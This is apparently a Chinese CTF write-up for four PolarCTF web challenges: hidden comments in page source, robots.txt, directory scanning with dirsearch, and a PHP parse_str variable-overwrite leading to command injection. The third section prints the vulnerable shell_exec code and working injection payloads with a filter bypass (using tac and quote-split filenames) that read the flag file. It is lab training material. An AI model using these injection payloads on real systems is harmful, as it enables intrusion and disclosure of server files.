polarctf靶场[WEB]Don‘t touch me、机器人、uploader、扫扫看

目录

[[web]Don't touch me](#[web]Don't touch me)

考点:查看源代码、前端

[web]机器人

考点:robot协议

[工具:御剑,kali dirsearch](#工具:御剑,kali dirsearch)

[web]覆盖

考点:@parse_str覆盖

[web]扫扫看

考点:目录扫描

[工具:御剑、kali dirsearch](#工具:御剑、kali dirsearch)


[web]Don't touch me

考点:查看源代码、前端

打开网页,叫我们找flag

我们打开源代码,发现了一个被注释的子域

访问,是另一个界面

在看源代码 ,发现有个3.php,点开

就可以发现了被注释的flag文件,fla.php

访问,得到本题flag

[web]机器人

考点:robot协议

工具:御剑,kali dirsearch

题目说是机器人,所以考虑是robots协议

当robots访问一个网站(比如http://www.abc.com)时,首先会检查该网站中是否存在http://www.abc.com/robots.txt这个文件,如果机器人找到这个文件,它就会根据这个文件的内容,来确定它访问权限的范围。(也就相当于一个管理权限的文件)

robots.txt文件用法举例:

User-agent(搜索引擎robots的名字):*(*代表所有)

Disallow(以Disallow开头的url都禁止访问):/(代表禁止所有引擎访问网站任何部分)

例:

User-agent:baiduspider

Disallow:

User-agent:*

Disallow:/

代表允许baiduspider来访问网站任何,其他都不行

进入robots.txt文件查看一下权限或者被隐藏了哪些,或者不确定访问什么可以用御剑或者kali 的dirsearch工具进行目录扫描

看到了一部分的flag,再看Disallow,应该是个目录

访问/27f5e15b6af3223f1176293cd015771d/flag.php

得到另一部分的flag,拼接一起便可得到flag

[web]覆盖

考点:@parse_str覆盖

php 复制代码
 <?php
error_reporting(0);
if (empty($_GET['id'])) {
    show_source(__FILE__);
    die();
} else {
    include 'flag.php';
    $a = "www.baidu.com";
    $result = "";
    $id = $_GET['id'];
    @parse_str($id);
    echo $a[0];
    if ($a[0] == 'www.polarctf.com') {
        $ip = $_GET['cmd'];
        $result .= shell_exec('ping -c 2 ' . $a[0] . $ip);
        if ($result) {
            echo "<pre>{$result}</pre>";
        }
    } else {
        exit('其实很简单!');
    }
} 

这段代码是一个简单的 PHP 网页应用,主要功能是根据特定条件执行命令并返回结果。如果没有提供 id 参数,就显示当前文件的源代码并终止程序。如果提供了 id 参数,并且通过特定方式将变量 $a 的第一个字符修改为 www.polarctf.com,同时提供 cmd 参数,就会执行 ping 命令并返回结果。

@parse_str($id);:这个函数不会检查变量 id 是否存在,如果通过其他方式传入数据给变量id ,且当前$id中数据存在,它将会直接覆盖掉

$result.= shell_exec('ping -c 2 '. $a[0]. $ip); :使用 shell_exec 函数执行 ping 命令,向 "www.polarctf.com" 和变量 $ip 指定的地址发送两个 ICMP 数据包,并将结果存储在变量 $result 中。

发现a[0]的值确实被更改了,那么接下来就简单了,先构造一个cmd=|ls;,发现回显了flag.php,但是不能直接读取,我们尝试用读取ls的命令,而且cat似乎被覆盖过滤了,所以我们使用tac。

有集中方法进行构造:

php 复制代码
?id=a[0]=www.polarctf.com&cmd=|tac `ls`;//回显之后直接可得到flag
 
?id=a[]=www.polarctf.com&cmd=|ls //发现有flag.php,但是不能直接读取
?id=a[0]=www.polarctf.com&cmd=;tac%20flag*
或?id=a[0]=www.polarctf.com&cmd=;tac%20fl''ag.php
?id=a[0]=www.polarctf.com&cmd=;tac f* //可直接读取flag

得到本题的flag

如果还想练习相同知识点,在相同的靶场也有类似的题目干正则该题的wp:https://blog.csdn.net/m0_73981089/article/details/138520071

[web]扫扫看

考点:目录扫描

工具:御剑、kali dirsearch

网页显示"或许你该扫一扫",所以我们使用御剑或者kali dirsearch工具扫一扫

这里使用kali dirsearch扫

dirsearch -u 网址 -e*

访问该子域,进入此页面

点击查看源代码

得到本题的flag

相关推荐
软件技术NINI1 分钟前
element实现动态路由+面包屑
前端·vue.js
YueTann17 分钟前
大模型入门3:理解LLAMA
android·llama
&岁月不待人&43 分钟前
Android 通过相机和系统相册获取图片,压缩,结果回调
android·数码相机
爆更小小刘2 小时前
Python基础语法(2)
开发语言·前端·python
网安kk2 小时前
2024网络安全与黑客技术:零基础自学手册
网络·学习·安全·web安全·网络安全·php
前端小菜鸟也有人起2 小时前
ElementUI大坑Notification修改样式
android·前端·elementui
终末圆3 小时前
JDBC与MyBatis:数据库访问技术的变迁【后端 15】
前端·数据结构·数据库·后端·算法·mybatis·jdbc
花下的晚风3 小时前
Vue实用操作-2-如何使用网页开发者工具
前端·javascript·vue.js
安冬的码畜日常3 小时前
【D3.js in Action 3 精译_022】3.2 使用 D3 完成数据准备工作
前端·javascript·信息可视化·数据挖掘·数据可视化·d3.js
挣钱花3883 小时前
Vue2时间轴组件(TimeLine/分页、自动顺序播放、暂停、换肤功能、时间选择,鼠标快速滑动)
开发语言·前端·javascript